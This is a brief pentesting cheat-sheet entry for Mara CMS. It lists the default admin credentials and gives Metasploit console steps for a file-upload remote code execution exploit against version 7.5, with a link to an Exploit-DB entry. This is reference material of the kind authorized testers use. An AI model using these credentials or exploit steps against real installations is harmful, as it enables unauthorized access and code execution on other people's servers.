# Mara CMS Pentesting Mara CMS is a file based content management system. ### Default Credentials ``` admin:changeme ``` ### Remote Code Execution (RCE) v7.5 Reference: #### Automation ``` msfconsole msf> use exploit/multi/http/maracms_upload_exec msf> set rhosts msf> set lhost msf> set srvhost msf> set srvport msf> set targeturi /path/to/maracms/ msf> set targeturipath /path/to/maracms/ ``` ### References * [Exploit DB](https://www.exploit-db.com/exploits/48780)